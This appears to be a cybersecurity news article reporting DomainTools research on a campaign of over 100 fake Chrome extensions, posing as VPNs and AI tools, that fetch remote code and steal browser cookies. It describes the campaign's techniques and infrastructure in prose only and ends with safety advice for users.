In over a year, an unknown cybercriminal spawned over 100 fake malicious Chrome extensions with dual functionalities, capable of tracking users and stealing their access tokens. The hacker bypasses Google’s defenses by injecting malicious scripts remotely, after the extension is installed.
A new report by DomainTools details a “massive, ongoing campaign of malicious Chrome extensions " that lure users to use “free” VPNs, AI tools, crypto or SEO utilities, and other Chrome extensions.
At the time of writing, many of the disclosed malicious extensions are still available on the Chrome Web Store (CWS).
“The extensions typically have a dual functionality, in which they generally appear to function as intended, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code,” the report explains.
Some examples of fraudulent extensions include Deepseek AI, DeBank, Manus AI, Eart VPN, Eelephant, Forti VPN, and SiteStats.
In this campaign, the threat actor first creates a lure website that masquerades as a legitimate service, productivity tool, or assistant. The lure website directs users to Google’s CWS to install the corresponding malicious extension.
The hacker has also established an ecosystem of API servers that control the extensions, send commands, and listen to user data. All of the few dozen detected servers used [.]top as their top-level domain.
“Analysis revealed these extensions can execute arbitrary code from attacker-controlled servers on all visited websites, enabling credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Some extensions were also observed attempting to steal all browser cookies, which may lead to account compromises,” the DomainTools researchers warn.
A separate research by Cybernews has previously revealed that Chrome extensions often require too many dangerous permissions. Over a month ago, 58 other malicious Chrome extensions were also discovered to be preying on users.
How does the hacker bypass Google’s defenses?
Chrome is transitioning to a new version of the extension platform, known as Manifest Version 3 (MV3). It is supposed to bring more security and higher efficiency.
“No more remotely hosted code,” Google says on the landing page.
However, the discovered malicious extensions depend on running remote code – they fetch rules from hacker hacker-controlled backend and execute them on every site visited by a user.
“The extensions analyzed appear to have working or partially working functionality and are commonly configured with excessive permissions to interact with every site the browser visits and retrieve and execute arbitrary code from a network of other actor-controlled domains,” the researchers explain.
Despite differences in names and masquerades, each extension had a similar code structure and hosting infrastructure.
One analyzed extension had a “background.js” script that fetches and applies “declarativeNetRequest” rules from the backend.
“This allows the author to modify network requests (block, redirect, modify headers) after the extension is installed, bypassing Chrome Web Store review for those changes. This could be used for malicious redirects, ad injection, or tracking,” the researchers said.
The background script was observed sending encrypted system data, such as platform, language, memory, cores, timezone, IP, country code, and receiving the rules and “potentially executable code.”
The extension’s content script, which is injected into all visited pages, was also observed executing arbitrary code, which was fetched from the attacker-controlled server.
A Forti VPN extension actually provided users with “some of the advertised purpose” by using a hardcoded API key to a third-party service. However, its main purpose was to connect to a malicious backend client and listen for commands using the WebSocket keep-alive mechanism.
When commanded, the extension would exfiltrate all browser cookies, compress and encode them in Base64, and send them to the hacker.
“It can be commanded to establish a separate WebSocket connection to act as a network proxy, potentially routing the user's traffic through malicious servers,” the DomainTools researchers noted.
The malicious extensions have backend API servers hardcoded, typically in the background.js or a similar file. To authenticate with the hacker’s server, the extensions use a standard JWT method and securely sign the data using SHA-256.
The malicious websites have many common registration patterns, such as registrar (NameSilo), name server, and IP ISP(Cloudflare), SSL issuer (WE1). The threat actor commonly uses a set of Facebook Tracker IDs, listed in the report with other indicators of compromise.
The researchers acknowledged that the Chrome Web Store has removed multiple of the actor’s malicious extensions after malware identification.
“However, the actor's persistence and the time lag in detection and removal pose a threat to users seeking productivity tools and browser enhancements,” they warn.
They recommend users stick to verified and reputable developers, carefully review requested permissions before installing extensions, and be especially wary of lookalike extensions. Antivirus software might help to detect the threat earlier.
Your email address will not be published. Required fields are markedmarked